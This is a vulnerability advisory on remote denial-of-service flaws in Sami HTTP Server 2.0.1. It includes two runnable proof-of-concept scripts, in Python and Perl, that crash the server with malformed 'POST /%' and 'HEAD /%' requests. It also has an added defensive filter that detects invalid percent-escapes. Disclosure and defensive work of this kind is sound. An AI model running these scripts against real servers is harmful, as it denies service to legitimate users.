Written by shinnai
Monday, 30 March 2009 22:08
KarjaSoft Sami HTTP Server Request Remote Denial of Service Vulnerabilities
-\\Bugtraq ID: 23445
-\\Class: Failure to Handle Exceptional Conditions
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Apr 12 2007 12:00AM
-\\Updated: Mar 30 2009 04:26PM
-\\Credit: shinnai is credited with the discovery of these vulnerabilities.
-\\Vulnerable: KarjaSoft Sami HTTP Server 2.0.1
-\\Discussion: Sami HTTP Server is prone to multiple remote denial-of-service vulnerabilities because the software fails to handle exceptional conditions.
Exploiting these issues allows remote attackers to crash the server application, denying further service to legitimate users.
This issue affects Sami HTTP Server 2.0.1; other versions may also be affected.
-\\Exploit(s)/PoC(s): The following exploit code is available:
===============================================================
23445.py
^^^^^^^^^
# usr/bin/python

import socket

print "-------------------------------------------------------------------------"
print " Sami HTTP Server 2.0.1 POST request Denial of Service"
print " url: http://www.karjasoft.com"
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org"
print " Sending to the webserver a 'POST /%' will cause an abnormal termination"
print " of the program that requires the reboot of the webserver."
print "-------------------------------------------------------------------------"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn = s.connect(("127.0.0.1",80))
    s.send("POST /% HTTP/1.0 \n\n")
except:
    print "Unable to connect. exiting."

===============================================================
23445.pl
^^^^^^^^^
#!/usr/bin/perl
#
# Sami HTTP Server v2.x Remote Denial of Service with (HEAD) request.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in handling the HEAD
# command. This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org

use IO::Socket;

print "[+] Author : Jonathan Salwan\n";
print "[+] Soft : Sami HTTP Server v2.x Remote DoS\n";

if (@ARGV < 1)
{
    print "[-] Usage: <file.pl> <host> <port>\n";
    print "[-] Exemple: file.pl 127.0.0.1 80\n";
    exit;
}

$ip = $ARGV[0];
$port = $ARGV[1];

print "[+] Sending request...\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Connexion FAILED!\n";

print $socket "HEAD /\x25 HTTP/1.0\r\n";
close($socket);
print "[+]Done!\n";
-\\Solution: Currently we are not aware of any solutions for these issues. If you feel we are in error or if you are aware of more recent information, please mail us.
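Both PoCs above send a request target containing a bare `%`, which is not a valid percent-escape under RFC 3986 (`%` must be followed by two hex digits). The following is an added example, not part of the original advisory: a request-line check that a filtering proxy in front of the server could apply before forwarding. The names `check_request_line` and `triage` and the sample requests are constructed for illustration, and the advisory itself does not state that percent-decoding is the root cause.

```python
import re

# RFC 3986 section 2.1: pct-encoded = "%" HEXDIG HEXDIG.
# Match any "%" that is NOT followed by exactly two hex digits.
_BAD_PCT = re.compile(r"%(?![0-9A-Fa-f]{2})")
# Method, request target, HTTP version; tolerate trailing whitespace.
_REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d\.\d)\s*$")


def check_request_line(raw: bytes) -> str:
    """Classify the first line of a raw HTTP request.

    Returns "ok", "malformed-request-line" or "bad-percent-escape".
    Anything other than "ok" should be answered with 400 by the
    filter and never forwarded to the backend server.
    """
    first = raw.split(b"\n", 1)[0].rstrip(b"\r")
    try:
        line = first.decode("ascii")
    except UnicodeDecodeError:
        return "malformed-request-line"
    match = _REQUEST_LINE.match(line)
    if not match:
        return "malformed-request-line"
    if _BAD_PCT.search(match.group(2)):
        return "bad-percent-escape"
    return "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = [
    b"GET /index.html HTTP/1.0\r\n\r\n",
    b"GET /docs/a%20b.txt HTTP/1.1\r\nHost: x\r\n\r\n",
    b"POST /% HTTP/1.0 \n\n",   # request line sent by 23445.py
    b"HEAD /% HTTP/1.0\r\n",    # request line sent by 23445.pl
    b"GET /a%2 HTTP/1.0\r\n\r\n",   # truncated escape
    b"GET /a%zz HTTP/1.0\r\n\r\n",  # non-hex escape
]


def triage(samples):
    """Return (request line, verdict) pairs for a list of raw requests."""
    return [(s.split(b"\n", 1)[0].strip().decode("ascii", "replace"),
             check_request_line(s)) for s in samples]


if __name__ == "__main__":
    for line, verdict in triage(SAMPLES):
        print(f"{verdict:24} {line}")
```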
-\\Reference(s): Sami HTTP Server Homepage http://www.karja.com/samihttp/main.ph (KarjaSoft)